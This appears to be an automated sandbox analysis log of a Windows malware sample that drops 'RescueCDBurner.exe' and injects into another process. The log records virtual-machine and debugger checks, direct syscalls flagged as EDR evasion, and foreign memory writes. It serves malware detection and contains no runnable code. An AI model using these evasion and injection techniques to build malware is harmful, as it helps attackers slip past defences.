Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30F169 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B30F169
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30D687 _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,	4_2_6B30D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B30F593 _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	4_2_6B30F593

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,

2_2_5BB3AFDD

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_001097A5 VirtualQuery,GetSystemInfo,

0_2_001097A5

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior

Source: RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: VMware
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000003.00000003.1349669359.000000000A82D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000003.00000002.1373074333.000000006CEDF000.00000008.00000001.01000000.0000000E.sdmp	Binary or memory string: l.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000004.00000002.1434737958.000000006BCFF000.00000008.00000001.01000000.00000014.sdmp	Binary or memory string: k.?AVQEmulationPaintEngine@@0/fk
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2452154985.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2055165214.000000000067A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2065326779.000000000067A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2657389325.000000000065F000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2408000909.000000000067A000.00000004.00000020.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2339606429.000000000065F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: cmd.exe, 00000005.00000002.1707439030.0000000005033000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000004.00000002.1425578694.0000000000934000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000004.00000002.1431760578.000000000ACE1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: =QemU
Source: RescueCDBurner.exe, 00000003.00000002.1373074333.000000006CEDF000.00000008.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000003.00000003.1349669359.000000000A82D000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1434737958.000000006BCFF000.00000008.00000001.01000000.00000014.sdmp	Binary or memory string: .?AVQEmulationPaintEngine@@

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_000EE88A

Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe

Code function: 4_2_6B336BA4 VirtualProtect ?,-00000001,00000104,?

4_2_6B336BA4

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,

2_2_5BB3CB21

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F48D8 mov eax, dword ptr fs:[00000030h]		0_2_000F48D8
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_006848D8 mov eax, dword ptr fs:[00000030h]		2_2_006848D8

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Code function: 0_2_000C394F GetProcessHeap,RtlAllocateHeap,

0_2_000C394F

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000EE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_000EE3D8
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000EE88A
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000EE9DC SetUnhandledExceptionFilter,	0_2_000EE9DC
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Code function: 0_2_000F3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000F3C76
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0067E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0067E3D8
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0067E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0067E88A
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_0067E9DC SetUnhandledExceptionFilter,	2_2_0067E9DC
Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe	Code function: 2_2_00683C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00683C76
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C51AD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	3_2_6C51AD2C
Source: C:\Windows\Temp\{016BF9DE-C6BA-4390-A69A-2DC08D9C2A70}\.ba\RescueCDBurner.exe	Code function: 3_2_6C4A07A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	3_2_6C4A07A7
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B33AD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,	4_2_6B33AD2C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B33C097 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6B33C097
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B2C07A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6B2C07A7
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Code function: 4_2_6B3A3727 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,	4_2_6B3A3727

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateMutant: Direct from: 0x7FF6DED43116	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED3C79D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEE071E7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x14011D93E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DED28A19	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DED9D833	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEDEE7C5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF6DEE97FEB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF6DEE9696A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDeviceIoControlFile: Direct from: 0x7FF6DEDA7976	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DEDF33DF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEE17E95	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF6DED47E48	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF6DED46CD3
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationThread: Direct from: 0x7FF6DEEA09CE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEE937DB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtEnumerateKey: Direct from: 0x7FF6DEE9890F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED308DE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEDECCA7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC95AA8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtEnumerateValueKey: Direct from: 0x7FF6DEDD465D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DECA0D97	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC83D92	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF6DED470E4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF8418A4B5E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED28C3E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF6DEE97FFF
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED24A3D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x14011D808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF6DEDE4AC4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF6DEE0A57E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDE5183	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC8A3EA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED31309	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF6DED28340	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF6DEE45120	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtOpenKeyEx: Direct from: 0x7FF6DED45EEC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DED1D346	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF6DEE9800D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DEDE48B3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateThreadEx: Direct from: 0x7FF6DEC841BF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryVolumeInformationFile: Direct from: 0x7FF6DED324A0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED73F0C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC8C4D3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF6DED464A6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF6DED29496	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED76D35	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED18AA9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF6DEE0EC2D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDF37A6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC87524	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x7FF6DEE95B77	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED36901	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	NtSetInformationThread: Direct from: 0x6C017B9C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC8E868	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDE552D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateThreadEx: Direct from: 0x7FF6DEE43324	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF6DED0F4BE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED75F50	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF6DEE19C9C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtDelayExecution: Direct from: 0x7FF6DEE1012A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED7319E	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	NtQuerySystemInformation: Direct from: 0x776663E1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC9399F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEE96D98	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DED1CB90	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DECDF709	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x7FF6DED2352F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC96355	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF8418826A1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEDBE0D3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtClose: Direct from: 0x7FF6DEE95B8E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateThreadEx: Direct from: 0x7FF6DEC83FB0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryInformationProcess: Direct from: 0x7FF6DED28418	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadFile: Direct from: 0x14011D832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED3BCC0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF6DED463B7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDE5A4D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDEA355	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF6DED39915	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDEA5AB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF6DEDE4987	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x7FF6DEE93A6A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtCreateFile: Direct from: 0x14011D7A4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC935D2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEDEA9B6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtSetInformationProcess: Direct from: 0x7FF6DED18E5D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC8E65D	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEDE8ADD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED71072	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF6DED76CF3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtTerminateProcess: Direct from: 0x7FF6DED275ED	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DED2362E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtQueryValueKey: Direct from: 0x7FF6DED46DE3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadVirtualMemory: Direct from: 0x7FF6DEDEA520	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtReadFile: Direct from: 0x7FF6DED1CDCA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6DEC8A692	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	NtMapViewOfSection: Direct from: 0x7FF6DED0F5AA	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 294010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe base: 33D010	Jump to behavior

Source: C:\Windows\Temp\{8EC8EC6B-64C2-4C91-BDF6-2F209A95D5A8}\.cr\24EPV9vjc5.exe

Code function: 2_2_5BB3EE0F _LogonUser_@24,SetLastError,newMultiByteFromWideChar,newMultiByteFromWideChar,newMultiByteFromWideChar,LogonUserA,GlobalFree,GlobalFree,GlobalFree,

2_2_5BB3EE0F

